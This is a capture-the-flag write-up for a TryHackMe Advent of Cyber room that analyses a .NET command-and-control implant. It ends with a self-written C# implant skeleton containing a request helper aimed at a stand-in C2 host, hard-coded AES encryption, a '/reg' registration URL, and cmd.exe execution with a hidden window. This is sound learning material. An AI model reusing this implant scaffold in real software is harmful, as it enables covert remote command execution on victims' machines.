Room: Advent of Cyber 2023 Day 9
C&C or C2 refers to command and control servers: infrastructure an attacker uses to talk to compromised hosts, sitting as an intermediary between the attacker and the victim so the attacker never has to connect to the victim directly.
Anonymity, command execution, data exfiltration and botnet coordination are just a few examples where a C2 server plays a crucial role.
Using it for mind control however is something entirely new to me, but fun nonetheless.
The User-Agent request header is a characteristic string that lets servers and network peers identify the application, operating system, vendor, and/or version of the requesting user agent.
We can find the User-Agent string in the “GetIt” function, where the HTTP request is built before it is sent.
Again referring to the Mozilla documentation, which lists all HTTP request methods. GET and POST are used most often.
The “CreateEncryptor” method uses the variable “bytes” as the encryption key. The answer to Task 3 is the string that gets converted to bytes when the variable “bytes” is created: the key is simply that hard-coded string.
In the main function we can find the first HTTP URL, which gets concatenated with “/reg” to form the registration endpoint the implant checks in to.
I made a typo, but TryHackMe still decided the answer was ok. 🤓
The .Sleeper function takes “count” as an argument, which is set a few lines above.
As the hint suggests, the answer has to be in seconds, not milliseconds. .NET sleep calls such as Thread.Sleep take their argument in milliseconds, so divide the value by 1000.
If the command is shell, we drop into the branch of the code that calls the ExecuteCommand function.
The ExecuteCommand function is what the attacker uses to execute commands on the victim's device.
Note that the ProcessWindowStyle is “Hidden”, so no console window appears and the victim will not notice that commands are being executed.
We can find the answer to Task 7 in the Implant method in the main function.
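To tie the findings together, here is an added example: a minimal, hypothetical C# implant sketch written for this write-up, not the Day 9 sample itself, that reproduces the patterns described above so you can see where each answer would come from when reading the decompiled code. The C2 URL, User-Agent string, key string and sleep value are placeholders I made up; nothing here is taken from the room's binary.

```csharp
// Added example (not the room's code): a hypothetical implant skeleton showing
// the five patterns the write-up looks for in dnSpy. All literals are placeholders.
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Security.Cryptography;
using System.Text;
using System.Threading;

class ImplantSketch
{
    // Placeholder values (assumptions for this example only).
    const string C2Base = "http://c2.example.invalid";
    const string UserAgent = "ExampleAgent/1.0";
    const string KeyString = "0123456789abcdef";   // 16 bytes -> AES-128 key
    const int SleepCount = 5000;                    // Thread.Sleep takes milliseconds

    // "GetIt" pattern: the User-Agent header is set on the request before it is sent.
    static string GetIt(string url)
    {
        var req = (HttpWebRequest)WebRequest.Create(url);
        req.Method = "GET";
        req.UserAgent = UserAgent;                  // <- this string answers the User-Agent task
        using var resp = (HttpWebResponse)req.GetResponse();
        using var reader = new StreamReader(resp.GetResponseStream());
        return reader.ReadToEnd();
    }

    // "CreateEncryptor" pattern: the key is whatever string gets turned into bytes here.
    static byte[] Encrypt(string plaintext, out byte[] iv)
    {
        byte[] bytes = Encoding.UTF8.GetBytes(KeyString); // <- the key string to report
        using var aes = Aes.Create();
        aes.Key = bytes;                            // must be 16, 24 or 32 bytes
        aes.GenerateIV();
        iv = aes.IV;
        using ICryptoTransform enc = aes.CreateEncryptor(aes.Key, aes.IV);
        byte[] pt = Encoding.UTF8.GetBytes(plaintext);
        return enc.TransformFinalBlock(pt, 0, pt.Length);
    }

    // "Sleeper" pattern: count is milliseconds, so the interval in seconds is count / 1000.
    static int Sleeper(int count)
    {
        Thread.Sleep(count);
        return count / 1000;
    }

    // "ExecuteCommand" pattern: runs the shell with a hidden window so nothing is visible.
    static string ExecuteCommand(string command)
    {
        var psi = new ProcessStartInfo("cmd.exe", "/c " + command)
        {
            WindowStyle = ProcessWindowStyle.Hidden, // <- what the write-up points out
            CreateNoWindow = true,
            UseShellExecute = false,
            RedirectStandardOutput = true,
        };
        using var p = Process.Start(psi);
        string output = p.StandardOutput.ReadToEnd();
        p.WaitForExit();
        return output;
    }

    static void Main()
    {
        // Registration pattern: base URL concatenated with "/reg".
        string regUrl = C2Base + "/reg";
        Console.WriteLine("Would register at: " + regUrl);
        Console.WriteLine("Beacon interval: " + (SleepCount / 1000) + " s");

        // Dispatch pattern: a "shell" task routes into ExecuteCommand.
        string task = "shell whoami";
        if (task.StartsWith("shell "))
            Console.WriteLine(ExecuteCommand(task.Substring("shell ".Length)));
    }
}
```

When reading a real sample, follow the same trail: find the request helper for the User-Agent, the byte array passed into CreateEncryptor for the key, the string concatenated onto the base URL for the registration path, the argument to the sleep call (divided by 1000 for seconds), and the ProcessStartInfo settings in the command-execution routine.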
Happy Hacking!